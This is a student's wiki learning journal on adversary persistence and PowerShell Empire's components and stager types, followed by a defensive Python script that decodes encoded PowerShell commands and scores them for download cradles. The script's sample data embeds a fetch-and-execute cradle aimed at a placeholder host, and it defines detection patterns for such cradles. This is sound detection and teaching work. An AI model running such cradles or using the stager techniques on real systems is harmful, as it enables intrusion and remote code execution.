Class 27: Learning Journal - VascoLucas01/cybersecurity-reading-notes GitHub Wiki
Introduction
[Date: 2023/06/19]
In this Class 27: Learning Journal, I am going to talk about the main ideas/concepts covered in the persistence lecture.
Today I Learned
Persistence
TA0003: Persistence
Persistence is a tactic in which the adversary attempts to maintain their foothold (access) on the targeted network.
- TA0003 in MITRE ATT&CK
- Techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access
- Access, actions, or configuration changes that let them maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code.
PowerShell Empire
Isn't Empire retired?
- Infamous for its use by nation-state APTs
- Encrypted C2 (Command & Control) traffic
- Popular post-exploitation framework
PowerShell Empire is a pure PowerShell post-exploitation agent built on cryptographically-secure communications and a flexible architecture.
- Similar to Metasploit framework, Empire sought to draw attention to the potential for PowerShell to be weaponized
- Its original mission has since been fulfilled and it is no longer maintained by its authors as of 2019
- However, it can still be used in a lab as an offensive toolkit
What are the important components of Empire?
- A listener is a process that runs on the C2 server and awaits connection requests from compromised hosts. It routes STDOUT data back to the C2 server's shell so the attacker can see what is happening
- An agent is a program that maintains a connection between C2 and the compromised host
- A stager is a snippet of code that allows malicious code to be run via the agent on the compromised host.
Stager types
- The launcher stager (./lib/stagers/launcher.py) is a commonly-used stager module, and generates a one-liner stage0 launcher for an Empire agent
- The launcher_bat stager (./lib/stagers/launcher_bat.py) generates a self-deleting .BAT file that executes a one-liner stage0 launcher for an Empire agent
- The macro stager (./lib/stagers/macro.py) generates an Office macro that launches an Empire stager. This macro can be embedded into any Office document for the purposes of phishing.
- The dll stager (./lib/stagers/dll.py) generates a reflectively-injectable MSF-compliant .DLL that loads the .NET runtime into a process and executes a download cradle to stage an Empire agent. These .DLLs are the key to running Empire in a process that is not powershell.exe. Using these .DLLs with Metasploit is described here.
Modules execute malicious commands on the compromised host for the attacker, such as harvesting credentials and escalating privileges.
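One way to turn the stager description above into detection logic, as an added example (this is not code from the lecture or from the Empire project): the launcher stager's stage0 one-liner is an encoded PowerShell command, so a defender can decode `-EncodedCommand` blobs from process-creation telemetry and score the classic flag combination (no profile, hidden window, encoded command) together with download-cradle markers in the decoded text and a suspicious parent process. The sample events, field names, marker lists and score weights below are constructed assumptions, not real telemetry or a vendor rule.

```python
import base64
import re
from typing import Optional

# Constructed helper: encode a script block the way PowerShell -EncodedCommand
# expects it (UTF-16LE without BOM, then base64). Used only to build sample data.
def _enc(script: str) -> str:
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed process-creation events, normalised the way a SIEM might present
# them. None of this is real telemetry; example.invalid is a reserved test domain.
SAMPLE_EVENTS = [
    {"pid": 4101, "parent": "explorer.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"pid": 4210, "parent": "winword.exe",
     "cmdline": "powershell -noP -sta -w 1 -enc "
                + _enc("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')")},
    {"pid": 4322, "parent": "cmd.exe",
     "cmdline": "powershell.exe -NoProfile -EncodedCommand "
                + _enc("Write-Output 'constructed benign'")},
]

# Flag patterns cover the abbreviated forms a one-liner launcher tends to use
# (-noP, -w 1, -enc) as well as the long forms. Each is worth one point.
FLAG_PATTERNS = {
    "noprofile": re.compile(r"(?i)\s-nop(?:rofile)?\b"),
    "hidden_window": re.compile(r"(?i)\s-w(?:indowstyle)?\s+(?:1|h(?:idden)?)\b"),
    "encoded": re.compile(r"(?i)\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})"),
    "noninteractive": re.compile(r"(?i)\s-noni(?:nteractive)?\b"),
}
# Substrings that indicate a download cradle inside the decoded command.
CRADLE_MARKERS = ("iex", "invoke-expression", "net.webclient", "downloadstring", "frombase64string")
# Office parents matter because the macro stager launches PowerShell from a document.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Assumed weights: decoded cradle and Office parent count double; 3+ is suspicious.
WEIGHTS = {"download_cradle": 2, "office_parent": 2}
THRESHOLD = 3


def decode_encoded_command(blob: str) -> Optional[str]:
    """Decode a base64 -EncodedCommand payload back to the PowerShell text, or None."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> dict:
    """Score one process-creation event and return the indicators that fired."""
    cmd = " " + event["cmdline"]  # leading space so a flag at position 0 still matches \s-flag
    hits = [name for name, pat in FLAG_PATTERNS.items() if pat.search(cmd)]
    decoded = None
    match = FLAG_PATTERNS["encoded"].search(cmd)
    if match:
        decoded = decode_encoded_command(match.group(1))
        if decoded and any(m in decoded.lower() for m in CRADLE_MARKERS):
            hits.append("download_cradle")
    if event["parent"].lower() in OFFICE_PARENTS:
        hits.append("office_parent")
    score = sum(WEIGHTS.get(h, 1) for h in hits)
    return {"pid": event["pid"], "indicators": hits, "decoded": decoded,
            "score": score, "suspicious": score >= THRESHOLD}


def triage(events) -> list:
    """Run analyze_event over a batch of events."""
    return [analyze_event(e) for e in events]


if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        verdict = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"pid={r['pid']} score={r['score']} {verdict} {r['indicators']}")
        if r["decoded"]:
            print(f"  decoded: {r['decoded']}")
```

The point of decoding rather than just flagging `-enc` is triage: the third event uses an encoded command but decodes to something an analyst can read and dismiss, while the second decodes to a download cradle launched from a Word process, which is the shape the launcher and macro stagers above produce.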